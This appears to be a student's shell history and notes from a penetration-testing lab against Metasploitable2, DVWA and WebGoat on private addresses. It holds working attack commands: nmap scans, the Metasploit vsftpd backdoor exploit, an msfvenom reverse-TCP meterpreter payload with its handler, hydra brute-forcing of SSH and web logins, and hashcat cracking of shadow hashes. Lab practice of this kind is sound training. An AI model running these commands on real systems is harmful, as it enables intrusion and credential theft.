metasploit
db_nmap -n -vvv -sV 10.10.10.1-254
services –up
services –up -p 80,443 -R
msfdb init
service postgresql start
msfconsole
eyewitness -f /root/ey/hosts –web –prepend-https
ifconfig
ipcalc [ip]
db_nmap -n -vvv 172.28.128.0/24
search vsf
set RHOSTS 172.28.128.3
use exploit/unix/ftp/vsftpd_234_backdoor
info
options
exploit
exploit
background
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION 1
exploit
sessions 3
cat .hashcat/hashcat.potfile
hydra -L userlist.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://172.28.128.1 -V -t 4 -I
hydra -l admin -p password 172.28.128.3 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed” -V
nc -v localhost 22
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
chmod o+x shell.elf
./shell.elf
use exploit/multi/handler
options
set lhost
set lport
set payload linux/x64/meterpreter/reverse_tcp
options
run
wfuzz
gobuster
cewl
1 sudo apt-get update
2 nmap 10.10.10.120
3 nmap 10.10.10.120
4 man nmap
5 nmap -A -T 4 -v 10.10.10.120
6 10.10.10.120
7 nmap -A -T 4 -v 10.10.10.152
8 nmap -sn -vvv -n 10.10.10.1-10
9 nmap -sn -vvv -n 10.10.10.1-10 --p 80,443
10 nmap -sn -vvv -n 10.10.10.1-10 -p 80,443
11 nmap -sS -vvv -n 10.10.10.1-10 -p 80,443
12 nmap -sS -vvv -Pn -n 10.10.10.1-10 -p 80,443
13 cd
14 mkdir nmap
15 cd nmap/
16 nmap 10.10.10.1-10 -vvv -sS -n -sV -p 80,443 -oA allhttp
17 ls
18 cat allhttp.gnmap
19 ls
20 rm *
21 nmap 10.10.10.1-254 -vvv -sS -n -sV -p 80,443 -oA allhttp
22 ls
23 cat allhttp.nmap
24 ls
25 cat allhttp.gnmap
26 cd
27 msfdb init
28 msfconsole
29 exit
30 cp tmp/msf-db-rhosts-20190523-4990-1al50ir
31 cp /tmp/msf-db-rhosts-20190523-4990-1al50ir hosts
32 ls
33 cat hosts
34 mkdir ey
35 mv hosts ey/
36 cd ho
37 cd ey
38 ls
39 eyewitness -f /root/ey/hosts –web –predend-https
40 cd
41 ls
42 cd ey
43 eyewitness -f /root/ey/hosts –web –predend-https
44 eyewitness -f /root/ey/hosts –web –prepend-https
45 ls
46 cp hosts
47 cat hosts
48 setxkbmap fi
49 ls
50 cd Documents/
51 ls
52 cd
53 cd Downloads/
54 ls
56 mkdir metasploitable2
57 cd metasploitable2/
58 free -m
59 setxkbmap fi
60 msfconsole
61 ifconfig
62 service postgresql start
63 msfconsole
64 ls
65 cd Dow
66 cd Downloads/
67 ls
69 service postgresql start
70 cd metasploitable2/
72 nano Vagrantfile
73 top
74 df -h
75 free -m
76 ifconfig
77 sudo apt-get install -y ipcalc
78 ifconfig
79 ipcalc
80 ipcalc 172.28.128.1
81 ifconfig
83 ipcalc 10.10.12.233
84 ipcalc 172.28.128.1
85 man ipcalc
86 ipcalc 192.168.1.0
87 ipcalc 129.168.1.0
88 ifconfig
89 ping 172.28.128.1
90 iproute
91 route -a
92 route
93 ipcalc 172.28.128.0
94 ipcalc 172.28.128.254
95 route
96 ifconfig
97 cd
98 msfconsole
99 hashcat
100 hashcat $1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/
101 hashcat $1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/ –force
102 man hashcat
103 nano hashfile
104 hashcat hashfile
105 hashcat –force hashfile
106 cat hashfile
107 nano hashfile
108 hashcat –force hashfile
109 man adduser
110 adduser test
111 cat /etc/shadow
112 nano hashfile
113 hashcat –force hashfile
114 nano hashfile
115 ls
116 nano notes
117 cd Dow
118 cd
119 cd Downloads/
120 ls
122 free -m
123 setxkbmap fi
124 ls
125 cd metasploitable2/
127 ls
128 nano Vagrantfile
129 ls
130 vagrant up
131 sudo apt-get install vagrant virtualbox
132 vagrant up
133 ipcalc
134 iproute
135 cd
136 cd metasploitable2/
137 ls
138 vagrant ssh
139 ifconfig
140 ssh test@172.28.128.1
141 ipcalc 172.28.128.1
142 hydra -h
143 hydra -l admin -P simplepasslist.txt http://172.28.128.3 http-post-form “/dvwa/login.php:ed=^USER^&pw=^PASS^:S=302”
144 hydra -l admin -P simplepasslist.txt 172.28.128.3 http-post-form “/dvwa/login.php:ed=^USER^&pw=^PASS^:S=302”
145 hydra -l admin -p password 172.28.128.3 http-post-form “/dvwa/login.php:ed=^USER^&pw=^PASS^:S=302”
146 hydra -l admin -p password 172.28.128.3 http-post-form “/dvwa/login.php:ed=^USER^&pw=^PASS^:S=302” -V
147 hydra -l admin -p password 172.28.128.3 http-post-form “/dvwa/login.php:ed=^USER^&pw=^PASS^” -V
148 hydra -l admin -p password 172.28.128.3 http-post-form “/dvwa/login.php:ed=^USER^&pw=^PASS^:S=302” -V
149 ls
150 cd metasploitable2/
151 ls
152 cat Vagrantfile
153 hydra -h
154 hydra -l admin -p password 172.28.128.3 http-post-form “/dvwa/login.php:ed=^USER^&pw=^PASS^&Login=Login:Login failed”” -V
155 hydra -l admin -p password 172.28.128.3 http-post-form “/dvwa/login.php:ed=^USER^&pw=^PASS^&Login=Login:Login failed” -V
156 hydra -l admin -p password 172.28.128.3 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed” -V
157 ssh root@10.10.10.133
158 msfvenom -h
159 msfvenom -l payloads
160 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.28.128.1 LPORT=443 -f elf > shell.elf
161 ls
162 cat shell.elf
163 file shell.elf
164 hostname -I
170 ls
171 ./shell.elf
172 chmod o+x shell.elf
173 ./shell.elf
174 ls
177 chmod o+x shell.elf
178 ./shell.elf
179 ssh vagrant@172.28.128.1
180 ls
181 cd metasploitable2/
182 vagrant up
183 ifconfig
184 man hashcat
185 adduser peruna
186 cat /etc/shadow
187 cd
188 ls
189 cat hashfile
190 nano hashfile
191 hashcat hashfile
192 hashcat hashfile –force
193 cat hashfile
194 man hashcat
195 hashcat hashfile –force -m 1800
196 adduser test
197 adduser test1
198 cat /etc/shadow
199 nano hashfile
200 hashcat hashfile –force -m 1800
201 hashcat hashfile –force -m 1800 -a 0 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
202 cat crac
203 ls
204 adduser test2
205 cat /etc/shadow
206 nano hashfile
207 hashcat hashfile –force -m 1800 -a 0 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
208 ls
209 cat cracked.txt
210 hashcat hashfile –force -m 1800 -a 1 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
211 hashcat hashfile –force -m 1800 -a 1 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt –show
212 hashcat hashfile –show –force -m 1800 -a 1 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
213 ls
214 cat /etc/shadow
215 nano hashfile
216 hashcat hashfile –force -m 1800 -a 0 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
217 cat cracked.txt
218 cat hashfile
219 rm cracked.txt
220 hashcat hashfile –force -m 1800 -a 1 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
221 ls
222 hashcat –force -m 1800 -a 3 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
223 ls
224 ls -lt
225 hashcat –force -m 1800 -a 1 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
226 man hashcat
227 hashcat –force -m 1800 -a 1 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
228 hashcat –force -m 1800 -a 0 -o cracked.txt hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
229 hashcat –force -m 1800 -a 0 hashfile /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
230 ls
231 ls -la
232 ls -a .hashcat
233 cat .hashcat/hashcat.potfile
234 locate wordlist
235 locate wordlist|grep rock
236 hashcat –force -m 1800 -a 0 hashfile /usr/share/wordlists/rockyou.txt.gz
237 hashcat –force -m 1800 –show hashfile /usr/share/wordlists/rockyou.txt.gz
238 hashcat –force -m 1800 hashfile /usr/share/wordlists/rockyou.txt.gz
239 locate wordlist
240 locate wordlist|grep -i pass
241 cat /usr/share/golismero/wordlist/fuzzdb/Discovery/PredictableRes/Passwords.fuzz.txt
242 cat /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
243 cat /usr/share/metasploit-framework/data/wordlists/password.lst
244 hashcat –force -m 1800 hashfile /usr/share/metasploit-framework/data/wordlists/password.lst
245 hashcat –force -m 1800 hashfile /usr/share/metasploit-framework/data/wordlists/password.lst –show
246 hashcat –force -m 1800 hashfile /usr/share/wordlists/rockyou.txt.gz
247 adduser test3
248 cat /etc/shadow
249 ls
250 nano hashfile
251 hashcat –force -m 1800 hashfile /usr/share/wordlists/rockyou.txt.gz
252 nano hashfile
253 hashcat –force -m 1800 hashfile /usr/share/wordlists/rockyou.txt.gz
254 cp /usr/share/wordlists/rockyou.txt.gz .
255 ls
256 unzip rockyou.txt.gz
257 gunzip rockyou.txt.gz
258 ls
259 hashcat –force -m 1800 hashfile rockyou.txt
260 cat /etc/shadow
261 nano hashfile
262 hashcat –force -m 1800 hashfile rockyou.txt
263 nano hashfile
264 hashcat –force -m 1800 hashfile rockyou.txt
265 sudo apt-get install ufw -y
266 ufw status
267 ufw enable
268 ufw status
269 man ufw
270 ufw status verbose
271 man hydra
272 ssh test3@localhost
273 hydra -h
274 nano simplepasslist.txt
275 hydra -l test3 -P simplepasslist.txt ssh@localhost
276 hydra -l test3 -P simplepasslist.txt ssh://localhost
277 locate wordlist
278 head /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
279 hydra -l test3 -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://localhost
280 nano userlist.txt
281 hydra -L userlist.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://localhost
282 hydra -L userlist.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://localhost -V -t 4
283 hydra -L userlist.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://localhost -V -t 4 -I
284 hydra -L userlist.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://172.28.128.1 -V -t 4 -I
xubuntu
3 sudo apt-get -y install virtualenv python3-pip
4 mkdir mitm
5 cd mitm/
6 virtualenv env -p python3
7 ls
8 source env/bin/activate
9 pip install mitproxy
EDITOR=nano mitmproxy -p 8888
17 sudo apt-get update
18 sudo apt-get -y install docker.io
19 sudo adduser $(whoami) docker
20 newgrp docker
21 docker pull webgoat/webgoat-7.1
81 docker run -p 8080:8080 -t webgoat/webgoat-7.1
sudo apt-get install -y metasploit-framework
msfdb init
msfconsole
db_nmap -n -vvv -sV 10.10.10.0/24
